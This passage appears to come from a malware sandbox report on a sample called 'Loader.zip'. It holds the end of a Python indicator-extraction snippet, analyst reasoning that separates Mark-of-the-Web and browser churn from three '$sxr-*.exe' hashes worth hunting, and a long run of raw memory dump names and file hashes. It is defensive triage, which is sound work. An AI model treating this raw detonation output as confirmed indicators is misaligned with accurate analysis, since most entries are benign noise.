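    print("hunt for:", *dropped_binary_iocs(parsed), sep="\n  ")
```

Run against the excerpt, the Zone.Identifier entry resolves to ZoneId=3 (Internet), which is the normal Mark-of-the-Web that Edge attaches to a file fetched from the web and is consistent with `Loader.zip` having come from the submitted URL; the "NTFS ADS" signature in the summary is therefore explained by the download itself, not by a stream hiding a second payload. The crashpad pipe hashes are those of zero bytes, and only the three `$sxr-*.exe` SHA256 values come out as hunt-worthy indicators; the Edge cache and preference files are browser churn from the detonation and should not be turned into detections.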
memory/1472-904-0x00007FF9BE0E0000-0x00007FF9BE2E9000-memory.dmp
memory/1068-905-0x00007FF99A010000-0x00007FF99AAD2000-memory.dmp
memory/1068-911-0x000002194F290000-0x000002194F2A0000-memory.dmp
memory/1068-912-0x000002194F290000-0x000002194F2A0000-memory.dmp
memory/1472-916-0x00007FF9BE0E0000-0x00007FF9BE2E9000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | e566632d8956997225be604d026c9b39 |
| SHA1 | 94a9aade75fffc63ed71404b630eca41d3ce130e |
| SHA256 | b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0 |
| SHA512 | f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd |
memory/1068-918-0x000002194F290000-0x000002194F2A0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 38569efaadca67de65a2338e1f1fca92 |
| SHA1 | 43dcbe781e171741b03f829db67d54ff91593097 |
| SHA256 | a6ae24ca91ff79da200eb7a91a09d47e69a8535c9dfc801e82c6c2b9f38078af |
| SHA512 | 63684a56497bb9a4425d5871a4b2c6e30fc6f5ff1ba908c4dfcb93d8939325f190053e9f4dde39ff3bce21f4407b0b4f11d038fe3e4934b52c543f3f9effdb66 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | b37b805cd16d6f7322bacc0c4ce535fe |
| SHA1 | cd9de109cb6a0f3f8531e060898c0016f90ebf19 |
| SHA256 | 8fb286ca539fb5464123553f7d86898849ae3a3188147af88c685f6560fcdd82 |
| SHA512 | 99ec39658366051d501c68825d8070bdbd09a2aef937ff2d752512fe9605cee10353b517cabd748e0ac8227e727e70e027debd770c7e855d5eb578413c9fa009 |
memory/1068-939-0x000002196F800000-0x000002196FEA6000-memory.dmp
memory/1472-940-0x00007FF9BE0E0000-0x00007FF9BE2E9000-memory.dmp
memory/1068-941-0x00007FF9BE0E0000-0x00007FF9BE2E9000-memory.dmp
memory/1068-942-0x00007FF9BE0E0000-0x00007FF9BE2E9000-memory.dmp
memory/1068-943-0x000002196FEB0000-0x0000021970598000-memory.dmp
memory/1068-944-0x00007FF9BE0E0000-0x00007FF9BE2E9000-memory.dmp
memory/1068-945-0x00007FF9BC780000-0x00007FF9BC83D000-memory.dmp
memory/1068-946-0x00007FF9BE0E0000-0x00007FF9BE2E9000-memory.dmp
memory/1068-947-0x00007FF9BE0E0000-0x00007FF9BE2E9000-memory.dmp
memory/1068-948-0x0000021936E40000-0x0000021936E62000-memory.dmp
memory/1068-949-0x0000021936FA0000-0x0000021936FA6000-memory.dmp
memory/1068-950-0x0000021936FC0000-0x0000021936FC6000-memory.dmp
memory/1068-951-0x0000021970A50000-0x0000021970F9E000-memory.dmp
memory/1068-952-0x0000021970FA0000-0x000002197174E000-memory.dmp
memory/1068-953-0x0000021971750000-0x0000021971ADC000-memory.dmp
memory/1068-954-0x0000021971AE0000-0x0000021971B92000-memory.dmp
memory/1472-956-0x00007FF99A010000-0x00007FF99AAD2000-memory.dmp
memory/1472-957-0x00007FF9BE0E0000-0x00007FF9BE2E9000-memory.dmp
memory/1068-958-0x0000021971F90000-0x0000021971FFA000-memory.dmp
memory/1068-959-0x00000219720B0000-0x00000219720F2000-memory.dmp
memory/1068-963-0x0000000180000000-0x0000000180007000-memory.dmp
memory/688-967-0x000001EEB1030000-0x000001EEB1059000-memory.dmp
memory/688-966-0x000001EEB1000000-0x000001EEB1023000-memory.dmp
memory/688-968-0x000001EEB1030000-0x000001EEB1059000-memory.dmp
memory/688-976-0x00007FF97E170000-0x00007FF97E180000-memory.dmp
memory/688-977-0x000001EEB1030000-0x000001EEB1059000-memory.dmp
memory/688-978-0x000001EEB1030000-0x000001EEB1059000-memory.dmp
memory/688-979-0x00007FF9BE184000-0x00007FF9BE185000-memory.dmp
memory/992-983-0x0000024959FB0000-0x0000024959FD9000-memory.dmp
memory/1068-986-0x00007FF99A010000-0x00007FF99AAD2000-memory.dmp
memory/1068-988-0x000002194F290000-0x000002194F2A0000-memory.dmp
memory/1068-989-0x000002194F290000-0x000002194F2A0000-memory.dmp
memory/992-995-0x0000024959FB0000-0x0000024959FD9000-memory.dmp
memory/992-996-0x0000024959FB0000-0x0000024959FD9000-memory.dmp
memory/992-994-0x00007FF97E170000-0x00007FF97E180000-memory.dmp
memory/1068-998-0x000002194F290000-0x000002194F2A0000-memory.dmp
memory/772-1001-0x00000249F35D0000-0x00000249F35F9000-memory.dmp
memory/1040-1015-0x000001E1FE570000-0x000001E1FE599000-memory.dmp
memory/772-1011-0x00000249F35D0000-0x00000249F35F9000-memory.dmp
memory/1068-1020-0x00007FF9BE0E0000-0x00007FF9BE2E9000-memory.dmp
memory/772-1010-0x00000249F35D0000-0x00000249F35F9000-memory.dmp
memory/772-1009-0x00007FF97E170000-0x00007FF97E180000-memory.dmp
memory/1068-1028-0x00007FF9BE0E0000-0x00007FF9BE2E9000-memory.dmp